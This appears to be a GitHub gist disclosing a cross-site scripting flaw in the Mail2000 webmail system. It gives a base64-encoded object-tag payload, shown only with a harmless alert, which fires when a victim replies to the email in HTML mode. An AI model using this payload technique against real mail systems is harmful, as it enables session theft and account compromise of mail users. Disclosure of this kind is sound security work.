Skip to content

Instantly share code, notes, and snippets.

@keniver

keniver/01.png Secret

Last active March 14, 2019 03:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save keniver/1f6092242ee79a8456a86bb7624bc171 to your computer and use it in GitHub Desktop.
Save keniver/1f6092242ee79a8456a86bb7624bc171 to your computer and use it in GitHub Desktop.
Maill2000 XSS
  1. Attacker send a mail with XSS payload to the victim

    Payload:

    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
  2. XSS will be triggered when victim try to reply this mail (HTML Mode) 01 02

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment